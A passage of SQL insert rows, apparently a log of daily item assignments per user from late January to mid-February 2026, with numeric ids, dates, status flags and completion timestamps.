(422, 42, 605, '2026-01-25', 0, 0, 0, NULL),
(423, 42, 738, '2026-01-25', 0, 0, 0, NULL),
(424, 42, 842, '2026-01-25', 0, 0, 0, NULL),
(425, 42, 238, '2026-01-25', 0, 0, 0, NULL),
(426, 42, 834, '2026-01-25', 0, 0, 0, NULL),
(427, 42, 767, '2026-01-25', 0, 0, 0, NULL),
(428, 42, 957, '2026-01-25', 0, 0, 0, NULL),
(429, 99, 959, '2026-01-25', 1, 0, 0, '2026-02-15 08:05:47'),
(430, 99, 630, '2026-01-25', 1, 0, 0, '2026-02-16 19:56:52'),
(431, 99, 710, '2026-01-25', 0, 0, 0, NULL),
(432, 99, 949, '2026-01-25', 0, 0, 0, NULL),
(433, 99, 238, '2026-01-25', 1, 0, 0, '2026-02-15 08:07:16'),
(434, 99, 253, '2026-01-25', 0, 0, 0, NULL),
(435, 99, 709, '2026-01-25', 1, 0, 0, '2026-02-15 08:02:39'),
(436, 99, 953, '2026-01-25', 1, 0, 0, '2026-02-18 12:08:36'),
(437, 99, 221, '2026-01-25', 0, 0, 0, NULL),
(438, 99, 951, '2026-01-25', 0, 0, 0, NULL),
(439, 74, 955, '2026-01-25', 0, 0, 0, NULL),
(440, 74, 840, '2026-01-25', 0, 0, 0, NULL),
(441, 74, 956, '2026-01-25', 0, 0, 0, NULL),
(442, 74, 959, '2026-01-25', 0, 0, 0, NULL),
(443, 74, 947, '2026-01-25', 0, 0, 0, NULL),
(444, 74, 945, '2026-01-25', 0, 0, 0, NULL),
(445, 74, 946, '2026-01-25', 0, 0, 0, NULL),
(446, 74, 671, '2026-01-25', 0, 0, 0, NULL),
(447, 74, 666, '2026-01-25', 0, 0, 0, NULL),
(448, 74, 697, '2026-01-25', 0, 0, 0, NULL),
(449, 102, 233, '2026-01-25', 0, 0, 0, NULL),
(450, 102, 956, '2026-01-25', 1, 0, 0, '2026-02-11 16:59:58'),
(451, 102, 760, '2026-01-25', 0, 0, 0, NULL),
(452, 102, 951, '2026-01-25', 1, 0, 0, '2026-02-11 17:00:33'),
(453, 102, 221, '2026-01-25', 0, 0, 0, NULL),
(454, 102, 252, '2026-01-25', 1, 0, 0, '2026-02-16 05:40:52'),
(455, 102, 253, '2026-01-25', 0, 0, 0, NULL),
(456, 102, 955, '2026-01-25', 0, 0, 0, NULL),
(457, 102, 959, '2026-01-25', 0, 0, 0, NULL),
(458, 102, 238, '2026-01-25', 0, 0, 0, NULL),
(459, 102, 729, '2026-01-26', 0, 0, 0, NULL),
(460, 102, 959, '2026-01-26', 0, 0, 0, NULL),
(461, 102, 250, '2026-01-26', 0, 0, 0, NULL),
(462, 102, 239, '2026-01-26', 0, 0, 0, NULL),
(463, 102, 953, '2026-01-26', 0, 0, 0, NULL),
(464, 102, 252, '2026-01-26', 1, 0, 0, '2026-02-16 05:40:52'),
(465, 102, 709, '2026-01-26', 0, 0, 0, NULL),
(466, 102, 229, '2026-01-26', 0, 0, 0, NULL),
(467, 102, 230, '2026-01-26', 0, 0, 0, NULL),
(468, 102, 630, '2026-01-26', 0, 0, 0, NULL),
(469, 107, 729, '2026-01-27', 0, 0, 0, NULL),
(470, 107, 250, '2026-01-27', 0, 0, 0, NULL),
(471, 107, 954, '2026-01-27', 0, 0, 0, NULL),
(472, 107, 710, '2026-01-27', 0, 0, 0, NULL),
(473, 107, 953, '2026-01-27', 0, 0, 0, NULL),
(474, 107, 632, '2026-01-27', 0, 0, 0, NULL),
(475, 107, 238, '2026-01-27', 0, 0, 0, NULL),
(476, 107, 959, '2026-01-27', 0, 0, 0, NULL),
(477, 107, 958, '2026-01-27', 0, 0, 0, NULL),
(478, 107, 219, '2026-01-27', 0, 0, 0, NULL),
(479, 108, 762, '2026-01-27', 0, 0, 0, NULL),
(480, 108, 219, '2026-01-27', 0, 0, 0, NULL),
(481, 108, 959, '2026-01-27', 0, 0, 0, NULL),
(482, 108, 956, '2026-01-27', 0, 0, 0, NULL),
(483, 108, 233, '2026-01-27', 0, 0, 0, NULL),
(484, 108, 302, '2026-01-27', 0, 0, 0, NULL),
(485, 108, 253, '2026-01-27', 0, 0, 0, NULL),
(486, 108, 632, '2026-01-27', 0, 0, 0, NULL),
(487, 108, 216, '2026-01-27', 0, 0, 0, NULL),
(488, 108, 953, '2026-01-27', 0, 0, 0, NULL),
(489, 109, 709, '2026-01-27', 0, 0, 0, NULL),
(490, 109, 953, '2026-01-27', 0, 0, 0, NULL),
(491, 109, 624, '2026-01-27', 1, 0, 0, '2026-02-15 11:28:03'),
(492, 109, 216, '2026-01-27', 1, 0, 0, '2026-02-15 11:29:35'),
(493, 109, 760, '2026-01-27', 0, 0, 0, NULL),
(494, 109, 229, '2026-01-27', 0, 0, 0, NULL),
(495, 109, 958, '2026-01-27', 0, 0, 0, NULL),
(496, 109, 632, '2026-01-27', 0, 0, 0, NULL),
(497, 109, 221, '2026-01-27', 0, 0, 0, NULL),
(498, 109, 636, '2026-01-27', 0, 0, 0, NULL),
(499, 107, 224, '2026-01-28', 1, 0, 0, '2026-01-28 19:29:47'),
(500, 107, 233, '2026-01-28', 1, 0, 0, '2026-01-28 18:04:50'),
(501, 107, 221, '2026-01-28', 0, 0, 0, NULL),
(502, 107, 729, '2026-01-28', 0, 0, 0, NULL),
(503, 107, 219, '2026-01-28', 0, 0, 0, NULL),
(504, 107, 636, '2026-01-28', 0, 0, 0, NULL),
(505, 107, 216, '2026-01-28', 0, 0, 0, NULL),
(506, 107, 957, '2026-01-28', 0, 0, 0, NULL),
(507, 107, 954, '2026-01-28', 0, 0, 0, NULL),
(508, 107, 238, '2026-01-28', 0, 0, 0, NULL),
(509, 34, 945, '2026-01-28', 1, 0, 0, '2026-02-13 04:56:20'),
(510, 34, 955, '2026-01-28', 1, 0, 0, '2026-02-13 04:56:20'),
(511, 34, 840, '2026-01-28', 1, 0, 0, '2026-02-13 04:56:20'),
(512, 34, 959, '2026-01-28', 1, 0, 0, '2026-02-13 04:56:20'),
(513, 34, 762, '2026-01-28', 1, 0, 0, '2026-02-13 04:56:20'),
(514, 34, 956, '2026-01-28', 0, 0, 0, NULL),
(515, 34, 745, '2026-01-28', 1, 0, 0, '2026-02-11 05:45:24'),
(516, 34, 747, '2026-01-28', 0, 0, 0, NULL),
(517, 34, 957, '2026-01-28', 0, 0, 0, NULL),
(518, 34, 230, '2026-01-28', 0, 0, 0, NULL),
(519, 107, 958, '2026-01-29', 0, 0, 0, NULL),
(520, 107, 687, '2026-01-29', 0, 0, 0, NULL),
(521, 107, 252, '2026-01-29', 0, 0, 0, NULL),
(522, 107, 951, '2026-01-29', 0, 0, 0, NULL),
(523, 107, 239, '2026-01-29', 0, 0, 0, NULL),
(524, 107, 956, '2026-01-29', 0, 0, 0, NULL),
(525, 107, 959, '2026-01-29', 0, 0, 0, NULL),
(526, 107, 709, '2026-01-29', 0, 0, 0, NULL),
(527, 107, 302, '2026-01-29', 0, 0, 0, NULL),
(528, 107, 234, '2026-01-29', 0, 0, 0, NULL),
(529, 107, 760, '2026-01-30', 0, 0, 0, NULL),
(530, 107, 959, '2026-01-30', 0, 0, 0, NULL),
(531, 107, 229, '2026-01-30', 0, 0, 0, NULL),
(532, 107, 729, '2026-01-30', 0, 0, 0, NULL),
(533, 107, 253, '2026-01-30', 0, 0, 0, NULL),
(534, 107, 957, '2026-01-30', 0, 0, 0, NULL),
(535, 107, 954, '2026-01-30', 0, 0, 0, NULL),
(536, 107, 219, '2026-01-30', 0, 0, 0, NULL),
(537, 107, 239, '2026-01-30', 0, 0, 0, NULL),
(538, 107, 958, '2026-01-30', 0, 0, 0, NULL),
(539, 115, 632, '2026-01-31', 0, 0, 0, NULL),
(540, 115, 955, '2026-01-31', 0, 0, 0, NULL),
(541, 115, 630, '2026-01-31', 0, 0, 0, NULL),
(542, 115, 762, '2026-01-31', 0, 0, 0, NULL),
(543, 115, 957, '2026-01-31', 0, 0, 0, NULL),
(544, 115, 710, '2026-01-31', 0, 0, 0, NULL),
(545, 115, 624, '2026-01-31', 0, 0, 0, NULL),
(546, 115, 238, '2026-01-31', 0, 0, 0, NULL),
(547, 115, 954, '2026-01-31', 0, 0, 0, NULL),
(548, 115, 687, '2026-01-31', 0, 0, 0, NULL),
(549, 116, 954, '2026-02-01', 0, 0, 0, NULL),
(550, 116, 252, '2026-02-01', 0, 0, 0, NULL),
(551, 116, 951, '2026-02-01', 0, 0, 0, NULL),
(552, 116, 958, '2026-02-01', 0, 0, 0, NULL),
(553, 116, 687, '2026-02-01', 0, 0, 0, NULL),
(554, 116, 253, '2026-02-01', 0, 0, 0, NULL),
(555, 116, 229, '2026-02-01', 0, 0, 0, NULL),
(556, 116, 238, '2026-02-01', 0, 0, 0, NULL),
(557, 116, 949, '2026-02-01', 0, 0, 0, NULL),
(558, 116, 636, '2026-02-01', 0, 0, 0, NULL),
(559, 34, 745, '2026-02-01', 1, 0, 0, '2026-02-11 05:45:24'),
(560, 34, 762, '2026-02-01', 1, 0, 0, '2026-02-13 04:56:20'),
(561, 34, 945, '2026-02-01', 1, 0, 0, '2026-02-13 04:56:20'),
(562, 34, 959, '2026-02-01', 1, 0, 0, '2026-02-13 04:56:20'),
(563, 34, 840, '2026-02-01', 1, 0, 0, '2026-02-13 04:56:20'),
(564, 34, 947, '2026-02-01', 1, 0, 0, '2026-02-13 04:56:20'),
(565, 34, 753, '2026-02-01', 1, 0, 0, '2026-02-13 04:56:20'),
(566, 34, 1042, '2026-02-01', 0, 0, 0, NULL),
(567, 34, 701, '2026-02-01', 0, 0, 0, NULL),
(568, 34, 946, '2026-02-01', 1, 0, 0, '2026-02-13 04:56:20'),
(569, 34, 947, '2026-02-02', 1, 0, 0, '2026-02-13 04:56:20'),
(570, 34, 762, '2026-02-02', 1, 0, 0, '2026-02-13 04:56:20'),
(571, 34, 745, '2026-02-02', 1, 0, 0, '2026-02-11 05:45:24'),
(572, 34, 956, '2026-02-02', 0, 0, 0, NULL),
(573, 34, 955, '2026-02-02', 1, 0, 0, '2026-02-13 04:56:20'),
(574, 34, 940, '2026-02-02', 0, 0, 0, NULL),
(575, 34, 945, '2026-02-02', 1, 0, 0, '2026-02-13 04:56:20'),
(576, 34, 838, '2026-02-02', 0, 0, 0, NULL),
(577, 34, 229, '2026-02-02', 0, 0, 0, NULL),
(578, 34, 854, '2026-02-02', 0, 0, 0, NULL),
(579, 123, 953, '2026-02-02', 0, 0, 0, NULL),
(580, 123, 958, '2026-02-02', 0, 0, 0, NULL),
(581, 123, 955, '2026-02-02', 0, 0, 0, NULL),
(582, 123, 230, '2026-02-02', 0, 0, 0, NULL),
(583, 123, 951, '2026-02-02', 0, 0, 0, NULL),
(584, 123, 636, '2026-02-02', 0, 0, 0, NULL),
(585, 123, 957, '2026-02-02', 0, 0, 0, NULL),
(586, 123, 949, '2026-02-02', 0, 0, 0, NULL),
(587, 123, 238, '2026-02-02', 0, 0, 0, NULL),
(588, 123, 302, '2026-02-02', 0, 0, 0, NULL),
(589, 124, 630, '2026-02-02', 0, 0, 0, NULL),
(590, 124, 729, '2026-02-02', 0, 0, 0, NULL),
(591, 124, 949, '2026-02-02', 0, 0, 0, NULL),
(592, 124, 687, '2026-02-02', 0, 0, 0, NULL),
(593, 124, 760, '2026-02-02', 0, 0, 0, NULL),
(594, 124, 959, '2026-02-02', 0, 0, 0, NULL),
(595, 124, 239, '2026-02-02', 0, 0, 0, NULL),
(596, 124, 252, '2026-02-02', 0, 0, 0, NULL),
(597, 124, 636, '2026-02-02', 0, 0, 0, NULL),
(598, 124, 954, '2026-02-02', 0, 0, 0, NULL),
(599, 107, 216, '2026-02-02', 0, 0, 0, NULL),
(600, 107, 654, '2026-02-02', 0, 0, 0, NULL),
(601, 107, 758, '2026-02-02', 0, 0, 0, NULL),
(602, 107, 751, '2026-02-02', 0, 0, 0, NULL),
(603, 107, 849, '2026-02-02', 0, 0, 0, NULL),
(604, 107, 854, '2026-02-02', 0, 0, 0, NULL),
(605, 107, 934, '2026-02-02', 0, 0, 0, NULL),
(606, 107, 757, '2026-02-02', 0, 0, 0, NULL),
(607, 107, 734, '2026-02-02', 0, 0, 0, NULL),
(608, 107, 945, '2026-02-02', 0, 0, 0, NULL),
(609, 123, 216, '2026-02-03', 0, 0, 0, NULL),
(610, 123, 252, '2026-02-03', 0, 0, 0, NULL),
(611, 123, 760, '2026-02-03', 0, 0, 0, NULL),
(612, 123, 624, '2026-02-03', 0, 0, 0, NULL),
(613, 123, 234, '2026-02-03', 0, 0, 0, NULL),
(614, 123, 253, '2026-02-03', 0, 0, 0, NULL),
(615, 123, 954, '2026-02-03', 0, 0, 0, NULL),
(616, 123, 229, '2026-02-03', 0, 0, 0, NULL),
(617, 123, 250, '2026-02-03', 0, 0, 0, NULL),
(618, 123, 230, '2026-02-03', 0, 0, 0, NULL),
(619, 34, 959, '2026-02-03', 1, 0, 0, '2026-02-13 04:56:20'),
(620, 34, 946, '2026-02-03', 1, 0, 0, '2026-02-13 04:56:20'),
(621, 34, 940, '2026-02-03', 0, 0, 0, NULL),
(622, 34, 955, '2026-02-03', 1, 0, 0, '2026-02-13 04:56:20'),
(623, 34, 753, '2026-02-03', 1, 0, 0, '2026-02-13 04:56:20'),
(624, 34, 745, '2026-02-03', 1, 0, 0, '2026-02-11 05:45:24'),
(625, 34, 840, '2026-02-03', 1, 0, 0, '2026-02-13 04:56:20'),
(626, 34, 737, '2026-02-03', 0, 0, 0, NULL),
(627, 34, 942, '2026-02-03', 0, 0, 0, NULL),
(628, 34, 956, '2026-02-03', 0, 0, 0, NULL),
(629, 109, 216, '2026-02-03', 1, 0, 0, '2026-02-15 11:29:35'),
(630, 109, 230, '2026-02-03', 1, 0, 0, '2026-02-18 16:54:52'),
(631, 109, 250, '2026-02-03', 0, 0, 0, NULL),
(632, 109, 710, '2026-02-03', 0, 0, 0, NULL),
(633, 109, 949, '2026-02-03', 1, 0, 0, '2026-02-15 01:55:46'),
(634, 109, 957, '2026-02-03', 0, 0, 0, NULL),
(635, 109, 955, '2026-02-03', 0, 0, 0, NULL),
(636, 109, 302, '2026-02-03', 0, 0, 0, NULL),
(637, 109, 956, '2026-02-03', 0, 0, 0, NULL),
(638, 109, 687, '2026-02-03', 0, 0, 0, NULL),
(639, 125, 710, '2026-02-04', 0, 0, 0, NULL),
(640, 125, 216, '2026-02-04', 0, 0, 0, NULL),
(641, 125, 253, '2026-02-04', 0, 0, 0, NULL),
(642, 125, 221, '2026-02-04', 0, 0, 0, NULL),
(643, 125, 252, '2026-02-04', 0, 0, 0, NULL),
(644, 125, 949, '2026-02-04', 0, 0, 0, NULL),
(645, 125, 219, '2026-02-04', 0, 0, 0, NULL),
(646, 125, 760, '2026-02-04', 0, 0, 0, NULL),
(647, 125, 239, '2026-02-04', 0, 0, 0, NULL),
(648, 125, 956, '2026-02-04', 0, 0, 0, NULL),
(649, 34, 745, '2026-02-04', 1, 0, 0, '2026-02-11 05:45:24'),
(650, 34, 956, '2026-02-04', 0, 0, 0, NULL),
(651, 34, 955, '2026-02-04', 1, 0, 0, '2026-02-13 04:56:20'),
(652, 34, 945, '2026-02-04', 1, 0, 0, '2026-02-13 04:56:20'),
(653, 34, 940, '2026-02-04', 0, 0, 0, NULL),
(654, 34, 946, '2026-02-04', 1, 0, 0, '2026-02-13 04:56:20'),
(655, 34, 840, '2026-02-04', 1, 0, 0, '2026-02-13 04:56:20'),
(656, 34, 710, '2026-02-04', 0, 0, 0, NULL),
(657, 34, 702, '2026-02-04', 0, 0, 0, NULL),
(658, 34, 230, '2026-02-04', 0, 0, 0, NULL),
(659, 126, 302, '2026-02-04', 0, 0, 0, NULL),
(660, 126, 253, '2026-02-04', 0, 0, 0, NULL),
(661, 126, 252, '2026-02-04', 0, 0, 0, NULL),
(662, 126, 250, '2026-02-04', 0, 0, 0, NULL),
(663, 126, 954, '2026-02-04', 0, 0, 0, NULL),
(664, 126, 953, '2026-02-04', 0, 0, 0, NULL),
(665, 126, 957, '2026-02-04', 0, 0, 0, NULL),
(666, 126, 636, '2026-02-04', 0, 0, 0, NULL),
(667, 126, 956, '2026-02-04', 0, 0, 0, NULL),
(668, 126, 958, '2026-02-04', 0, 0, 0, NULL),
(669, 34, 959, '2026-02-05', 1, 0, 0, '2026-02-13 04:56:20'),
(670, 34, 956, '2026-02-05', 0, 0, 0, NULL),
(671, 34, 753, '2026-02-05', 1, 0, 0, '2026-02-13 04:56:20'),
(672, 34, 947, '2026-02-05', 1, 0, 0, '2026-02-13 04:56:20'),
(673, 34, 940, '2026-02-05', 0, 0, 0, NULL),
(674, 34, 945, '2026-02-05', 1, 0, 0, '2026-02-13 04:56:20'),
(675, 34, 840, '2026-02-05', 1, 0, 0, '2026-02-13 04:56:20'),
(676, 34, 839, '2026-02-05', 0, 0, 0, NULL),
(677, 34, 619, '2026-02-05', 0, 0, 0, NULL),
(678, 34, 230, '2026-02-05', 0, 0, 0, NULL),
(679, 74, 956, '2026-02-05', 0, 0, 0, NULL),
(680, 74, 947, '2026-02-05', 0, 0, 0, NULL),
(681, 74, 946, '2026-02-05', 0, 0, 0, NULL),
(682, 74, 955, '2026-02-05', 0, 0, 0, NULL),
(683, 74, 945, '2026-02-05', 0, 0, 0, NULL),
(684, 74, 959, '2026-02-05', 0, 0, 0, NULL),
(685, 74, 840, '2026-02-05', 0, 0, 0, NULL),
(686, 74, 250, '2026-02-05', 0, 0, 0, NULL),
(687, 74, 846, '2026-02-05', 0, 0, 0, NULL),
(688, 74, 234, '2026-02-05', 0, 0, 0, NULL),
(689, 65, 951, '2026-02-05', 0, 0, 0, NULL),
(690, 65, 234, '2026-02-05', 0, 0, 0, NULL),
(691, 65, 219, '2026-02-05', 0, 0, 0, NULL),
(692, 65, 253, '2026-02-05', 0, 0, 0, NULL),
(693, 65, 955, '2026-02-05', 0, 0, 0, NULL),
(694, 65, 238, '2026-02-05', 0, 0, 0, NULL),
(695, 65, 624, '2026-02-05', 0, 0, 0, NULL),
(696, 65, 636, '2026-02-05', 1, 0, 0, '2026-02-05 20:00:26'),
(697, 65, 710, '2026-02-05', 0, 0, 0, NULL),
(698, 65, 953, '2026-02-05', 0, 0, 0, NULL),
(699, 127, 632, '2026-02-05', 0, 0, 0, NULL),
(700, 127, 710, '2026-02-05', 0, 0, 0, NULL),
(701, 127, 949, '2026-02-05', 0, 0, 0, NULL),
(702, 127, 951, '2026-02-05', 0, 0, 0, NULL),
(703, 127, 957, '2026-02-05', 0, 0, 0, NULL),
(704, 127, 959, '2026-02-05', 0, 0, 0, NULL),
(705, 127, 953, '2026-02-05', 0, 0, 0, NULL),
(706, 127, 219, '2026-02-05', 0, 0, 0, NULL),
(707, 127, 238, '2026-02-05', 0, 0, 0, NULL),
(708, 127, 234, '2026-02-05', 0, 0, 0, NULL),
(709, 126, 954, '2026-02-05', 0, 0, 0, NULL),
(710, 126, 762, '2026-02-05', 0, 0, 0, NULL),
(711, 126, 710, '2026-02-05', 0, 0, 0, NULL),
(712, 126, 687, '2026-02-05', 0, 0, 0, NULL),
(713, 126, 624, '2026-02-05', 0, 0, 0, NULL),
(714, 126, 632, '2026-02-05', 0, 0, 0, NULL),
(715, 126, 949, '2026-02-05', 0, 0, 0, NULL),
(716, 126, 250, '2026-02-05', 0, 0, 0, NULL),
(717, 126, 219, '2026-02-05', 0, 0, 0, NULL),
(718, 126, 239, '2026-02-05', 0, 0, 0, NULL),
(719, 126, 250, '2026-02-06', 0, 0, 0, NULL),
(720, 126, 229, '2026-02-06', 0, 0, 0, NULL),
(721, 126, 238, '2026-02-06', 0, 0, 0, NULL),
(722, 126, 949, '2026-02-06', 0, 0, 0, NULL),
(723, 126, 762, '2026-02-06', 0, 0, 0, NULL),
(724, 126, 951, '2026-02-06', 0, 0, 0, NULL),
(725, 126, 760, '2026-02-06', 0, 0, 0, NULL),
(726, 126, 729, '2026-02-06', 0, 0, 0, NULL),
(727, 126, 958, '2026-02-06', 0, 0, 0, NULL),
(728, 126, 630, '2026-02-06', 0, 0, 0, NULL),
(729, 128, 238, '2026-02-07', 0, 0, 0, NULL),
(730, 128, 949, '2026-02-07', 0, 0, 0, NULL),
(731, 128, 760, '2026-02-07', 0, 0, 0, NULL),
(732, 128, 630, '2026-02-07', 0, 0, 0, NULL),
(733, 128, 252, '2026-02-07', 0, 0, 0, NULL),
(734, 128, 632, '2026-02-07', 0, 0, 0, NULL),
(735, 128, 221, '2026-02-07', 0, 0, 0, NULL),
(736, 128, 955, '2026-02-07', 0, 0, 0, NULL),
(737, 128, 954, '2026-02-07', 0, 0, 0, NULL),
(738, 128, 762, '2026-02-07', 0, 0, 0, NULL),
(739, 123, 302, '2026-02-07', 0, 0, 0, NULL),
(740, 123, 234, '2026-02-07', 0, 0, 0, NULL),
(741, 123, 239, '2026-02-07', 0, 0, 0, NULL),
(742, 123, 253, '2026-02-07', 0, 0, 0, NULL),
(743, 123, 229, '2026-02-07', 0, 0, 0, NULL),
(744, 123, 252, '2026-02-07', 0, 0, 0, NULL),
(745, 123, 687, '2026-02-07', 0, 0, 0, NULL),
(746, 123, 958, '2026-02-07', 0, 0, 0, NULL),
(747, 123, 959, '2026-02-07', 0, 0, 0, NULL),
(748, 123, 956, '2026-02-07', 0, 0, 0, NULL),
(749, 34, 955, '2026-02-07', 1, 0, 0, '2026-02-13 04:56:20'),
(750, 34, 840, '2026-02-07', 1, 0, 0, '2026-02-13 04:56:20'),
(751, 34, 753, '2026-02-07', 1, 0, 0, '2026-02-13 04:56:20'),
(752, 34, 956, '2026-02-07', 0, 0, 0, NULL),
(753, 34, 947, '2026-02-07', 1, 0, 0, '2026-02-13 04:56:20'),
(754, 34, 959, '2026-02-07', 1, 0, 0, '2026-02-13 04:56:20'),
(755, 34, 940, '2026-02-07', 0, 0, 0, NULL),
(756, 34, 652, '2026-02-07', 0, 0, 0, NULL),
(757, 34, 663, '2026-02-07', 0, 0, 0, NULL),
(758, 34, 230, '2026-02-07', 0, 0, 0, NULL),
(759, 129, 949, '2026-02-07', 0, 0, 0, NULL),
(760, 129, 954, '2026-02-07', 0, 0, 0, NULL),
(761, 129, 762, '2026-02-07', 0, 0, 0, NULL),
(762, 129, 219, '2026-02-07', 0, 0, 0, NULL),
(763, 129, 687, '2026-02-07', 0, 0, 0, NULL),
(764, 129, 229, '2026-02-07', 0, 0, 0, NULL),
(765, 129, 710, '2026-02-07', 0, 0, 0, NULL),
(766, 129, 250, '2026-02-07', 0, 0, 0, NULL),
(767, 129, 216, '2026-02-07', 0, 0, 0, NULL),
(768, 129, 957, '2026-02-07', 0, 0, 0, NULL),
(769, 34, 959, '2026-02-08', 1, 0, 0, '2026-02-13 04:56:20'),
(770, 34, 745, '2026-02-08', 1, 0, 0, '2026-02-11 05:45:24'),
(771, 34, 946, '2026-02-08', 1, 0, 0, '2026-02-13 04:56:20'),
(772, 34, 945, '2026-02-08', 1, 0, 0, '2026-02-13 04:56:20'),
(773, 34, 753, '2026-02-08', 1, 0, 0, '2026-02-13 04:56:20'),
(774, 34, 955, '2026-02-08', 1, 0, 0, '2026-02-13 04:56:20'),
(775, 34, 947, '2026-02-08', 1, 0, 0, '2026-02-13 04:56:20'),
(776, 34, 685, '2026-02-08', 0, 0, 0, NULL),
(777, 34, 674, '2026-02-08', 0, 0, 0, NULL),
(778, 34, 840, '2026-02-08', 1, 0, 0, '2026-02-13 04:56:20'),
(779, 131, 253, '2026-02-08', 0, 0, 0, NULL),
(780, 131, 709, '2026-02-08', 0, 0, 0, NULL),
(781, 131, 729, '2026-02-08', 0, 0, 0, NULL),
(782, 131, 219, '2026-02-08', 0, 0, 0, NULL),
(783, 131, 957, '2026-02-08', 0, 0, 0, NULL),
(784, 131, 252, '2026-02-08', 0, 0, 0, NULL),
(785, 131, 221, '2026-02-08', 0, 0, 0, NULL),
(786, 131, 624, '2026-02-08', 0, 0, 0, NULL),
(787, 131, 250, '2026-02-08', 0, 0, 0, NULL),
(788, 131, 234, '2026-02-08', 0, 0, 0, NULL),
(789, 133, 959, '2026-02-08', 0, 0, 0, NULL),
(790, 133, 729, '2026-02-08', 0, 0, 0, NULL),
(791, 133, 219, '2026-02-08', 0, 0, 0, NULL),
(792, 133, 252, '2026-02-08', 0, 0, 0, NULL),
(793, 133, 250, '2026-02-08', 0, 0, 0, NULL),
(794, 133, 253, '2026-02-08', 0, 0, 0, NULL),
(795, 133, 709, '2026-02-08', 0, 0, 0, NULL),
(796, 133, 229, '2026-02-08', 0, 0, 0, NULL),
(797, 133, 230, '2026-02-08', 0, 0, 0, NULL),
(798, 133, 956, '2026-02-08', 0, 0, 0, NULL),
(799, 135, 953, '2026-02-08', 0, 0, 0, NULL),
(800, 135, 302, '2026-02-08', 0, 0, 0, NULL),
(801, 135, 238, '2026-02-08', 0, 0, 0, NULL),
(802, 135, 632, '2026-02-08', 0, 0, 0, NULL),
(803, 135, 710, '2026-02-08', 0, 0, 0, NULL),
(804, 135, 624, '2026-02-08', 0, 0, 0, NULL),
(805, 135, 959, '2026-02-08', 0, 0, 0, NULL),
(806, 135, 252, '2026-02-08', 0, 0, 0, NULL),
(807, 135, 234, '2026-02-08', 0, 0, 0, NULL),
(808, 135, 630, '2026-02-08', 0, 0, 0, NULL),
(809, 42, 723, '2026-02-08', 0, 0, 0, NULL),
(810, 42, 684, '2026-02-08', 0, 0, 0, NULL),
(811, 42, 718, '2026-02-08', 0, 0, 0, NULL),
(812, 42, 947, '2026-02-08', 0, 0, 0, NULL),
(813, 42, 751, '2026-02-08', 0, 0, 0, NULL),
(814, 42, 940, '2026-02-08', 0, 0, 0, NULL),
(815, 42, 742, '2026-02-08', 0, 0, 0, NULL),
(816, 42, 935, '2026-02-08', 0, 0, 0, NULL),
(817, 42, 938, '2026-02-08', 0, 0, 0, NULL),
(818, 136, 238, '2026-02-09', 0, 0, 0, NULL),
(819, 136, 760, '2026-02-09', 0, 0, 0, NULL),
(820, 136, 630, '2026-02-09', 0, 0, 0, NULL),
(821, 136, 956, '2026-02-09', 0, 0, 0, NULL),
(822, 136, 710, '2026-02-09', 0, 0, 0, NULL),
(823, 136, 762, '2026-02-09', 0, 0, 0, NULL),
(824, 136, 250, '2026-02-09', 0, 0, 0, NULL),
(825, 136, 216, '2026-02-09', 0, 0, 0, NULL),
(826, 136, 253, '2026-02-09', 0, 0, 0, NULL),
(827, 136, 219, '2026-02-09', 0, 0, 0, NULL),
(828, 137, 762, '2026-02-10', 0, 0, 0, NULL),
(829, 137, 953, '2026-02-10', 0, 0, 0, NULL),
(830, 137, 230, '2026-02-10', 0, 0, 0, NULL),
(831, 137, 238, '2026-02-10', 0, 0, 0, NULL),
(832, 137, 252, '2026-02-10', 0, 0, 0, NULL),
(833, 137, 709, '2026-02-10', 0, 0, 0, NULL),
(834, 137, 687, '2026-02-10', 1, 0, 0, '2026-02-13 03:04:15'),
(835, 137, 632, '2026-02-10', 0, 0, 0, NULL),
(836, 137, 951, '2026-02-10', 0, 0, 0, NULL),
(837, 137, 957, '2026-02-10', 0, 0, 0, NULL),
(838, 34, 753, '2026-02-10', 1, 0, 0, '2026-02-13 04:56:20'),
(839, 34, 955, '2026-02-10', 1, 0, 0, '2026-02-13 04:56:20'),
(840, 34, 940, '2026-02-10', 0, 0, 0, NULL),
(841, 34, 945, '2026-02-10', 1, 0, 0, '2026-02-13 04:56:20'),
(842, 34, 947, '2026-02-10', 1, 0, 0, '2026-02-13 04:56:20'),
(843, 34, 745, '2026-02-10', 1, 0, 0, '2026-02-11 05:45:24'),
(844, 34, 956, '2026-02-10', 0, 0, 0, NULL),
(845, 34, 840, '2026-02-10', 1, 0, 0, '2026-02-13 04:56:20'),
(846, 34, 851, '2026-02-10', 0, 0, 0, NULL),
(847, 34, 946, '2026-02-10', 1, 0, 0, '2026-02-13 04:56:20'),
(848, 133, 762, '2026-02-11', 0, 0, 0, NULL),
(849, 133, 760, '2026-02-11', 0, 0, 0, NULL),
(850, 133, 219, '2026-02-11', 0, 0, 0, NULL),
(851, 133, 229, '2026-02-11', 0, 0, 0, NULL),
(852, 133, 624, '2026-02-11', 0, 0, 0, NULL),
(853, 133, 710, '2026-02-11', 0, 0, 0, NULL),
(854, 133, 252, '2026-02-11', 0, 0, 0, NULL),
(855, 133, 221, '2026-02-11', 0, 0, 0, NULL),
(856, 133, 687, '2026-02-11', 0, 0, 0, NULL),
(857, 133, 238, '2026-02-11', 0, 0, 0, NULL),
(858, 34, 947, '2026-02-11', 1, 0, 0, '2026-02-13 04:56:20'),
(859, 34, 840, '2026-02-11', 1, 0, 0, '2026-02-13 04:56:20'),
(860, 34, 945, '2026-02-11', 1, 0, 0, '2026-02-13 04:56:20'),
(861, 34, 955, '2026-02-11', 1, 0, 0, '2026-02-13 04:56:20'),
(862, 34, 956, '2026-02-11', 0, 0, 0, NULL),
(863, 34, 762, '2026-02-11', 1, 0, 0, '2026-02-13 04:56:20'),
(864, 34, 940, '2026-02-11', 0, 0, 0, NULL),
(865, 34, 720, '2026-02-11', 0, 0, 0, NULL),
(866, 34, 609, '2026-02-11', 0, 0, 0, NULL),
(867, 34, 230, '2026-02-11', 0, 0, 0, NULL),
(868, 102, 938, '2026-02-11', 0, 0, 0, NULL),
(869, 102, 933, '2026-02-11', 0, 0, 0, NULL),
(870, 102, 219, '2026-02-11', 0, 0, 0, NULL),
(871, 102, 711, '2026-02-11', 1, 0, 0, '2026-02-16 05:42:03'),
(872, 102, 655, '2026-02-11', 0, 0, 0, NULL),
(873, 102, 750, '2026-02-11', 0, 0, 0, NULL),
(874, 102, 709, '2026-02-11', 0, 0, 0, NULL),
(875, 102, 718, '2026-02-11', 0, 0, 0, NULL),
(876, 102, 947, '2026-02-11', 0, 0, 0, NULL),
